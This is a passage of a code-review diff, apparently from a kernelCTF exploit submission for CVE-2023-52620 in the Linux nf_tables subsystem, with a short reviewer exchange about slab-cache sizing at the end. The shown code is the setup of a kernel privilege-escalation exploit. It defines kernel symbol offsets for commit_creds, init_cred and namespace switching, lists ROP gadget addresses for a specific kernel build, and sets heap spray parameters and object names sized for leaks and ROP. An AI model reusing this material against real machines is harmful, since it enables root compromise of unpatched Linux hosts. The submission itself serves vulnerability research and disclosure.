pocs/linux/kernelctf/CVE-2023-52620_lts_cos_mitigation/exploit/lts-6.1.78/exploit.c

```diff
@@ -0,0 +1,875 @@
+#define _GNU_SOURCE
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <string.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <err.h>
+#include <errno.h>
+#include <net/if.h>
+#include <arpa/inet.h>
+
+#include <sys/wait.h>
+#include <sys/syscall.h>
+#include <linux/rtnetlink.h>
+#include <linux/netfilter/nf_tables.h>
+#include <linux/netfilter.h>
+
+#include <libmnl/libmnl.h>
+
+#include <libnftnl/table.h>
+#include <libnftnl/chain.h>
+#include <libnftnl/set.h>
+#include <libnftnl/rule.h>
+#include <libnftnl/expr.h>
+
+#include "netlink_utils.h"
+
+#define TABLE_SPRAY     0x200
+#define SET_SPRAY       0x10
+#define BUF_SIZE        0x1000 * 0x100
+
+#define KMALLOC_64_SIZE         64
+#define KMALLOC_96_SIZE         96
+#define KMALLOC_192_SIZE        192
+#define NFT_RULE_HEADER_SIZE    25
+
+#define FIND_TASK_BY_VPID                           0x1b3a60
+#define SWITCH_TASK_NAMESPACES                      0x1bb4f0
+#define COMMIT_CREDS                                0x1bd090
+#define INIT_CRED                                   0x28768e0
+#define INIT_NSPROXY                                0x28766a0
+#define SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE  0x1201146
+#define NFT_COUNTER_OPS                             0x1b2a4c0
+#define RCU_READ_LOCK_NESTING_OFF                   0x474
+
+#define PUSH_RBX_POP_RSP   0xf82bf9;    // 0xffffffff81f82bf9 : push rbx ; and byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; jmp 0xffffffff82404c80
+#define POP_RDI_RET        0x278a27;    // 0xffffffff81278a27 : pop rdi ; jmp 0xffffffff82404c80
+#define POP_RSI_RET        0x5889f8;    // 0xffffffff815889f8 : pop rsi ; jmp 0xffffffff82404c80
+#define ADD_RAX_RSI_RET    0x037000;    // 0xffffffff81037000 : add rax, rsi ; jmp 0xffffffff82404c80
+#define POP_RCX_RET        0x02789d;    // 0xffffffff8102789d : pop rcx ; jmp 0xffffffff82404c80
+#define MOV_RAX_RCX_RET    0x7219fb;    // 0xffffffff817219fb : mov qword ptr [rax], rcx ; jmp 0xffffffff82404c80
+#define MOV_RDI_RAX_RET    0x118ea2b;   // 0xffffffff8218ea2b : mov rdi, rax ; rep movsq qword ptr [rdi], qword ptr [rsi] ; jmp 0xffffffff82404c80
+#define POP_RSP_RET        0x008a04;    // 0xffffffff81008a04 : pop rsp ; jmp 0xffffffff82404c80
+
+#define CHAIN_NAME_OFF      0x70
+
+uint64_t counter_ops = 0;
+uint64_t kbase = 0;
+uint64_t kmalloc_96 = 0;
+
+char* buf;
+struct nlmsghdr * nlh;
+struct mnl_nlmsg_batch * batch;
+struct mnl_socket * nl;
+uint32_t portid;
+uint8_t family = NFPROTO_IPV4;
+int seq = 0;
+int handle = 0, handle_leak_kbase = 0, handle_leak_heap = 0, handle_rop = 0;
+
+char * table1_name = "table1";
+char * set_leak_name = "set_leak_name";
+char * set_rop_name = "set_rop";
+char * chain_base_name = "chain1";
+char * chain_dummy_name = "chain_dummy_name";
+char * chain_leak_name = "chain_leak_name";
+char * chain_rop_name = "chain_rop_name_chain_rop_name_rop_name";
```

Comment:
Comment here if the length of the `chain_rop_name_chain_rop_name_rop_name` value matters or not (`name` is allocated to the right cache). My currently understanding is that the length would matter for leaking data, but it does matter for the ROP chain part (or does it?).

Reply:
I added a comment as follows.

```
// allocate chain->name to kmalloc-cg-16
char * chain_leak_name = "chain_leak_name";
// allocate chain->name to kmalloc-cg-64
char * chain_rop_name = "chain_rop_name_chain_rop_name_rop_name";
```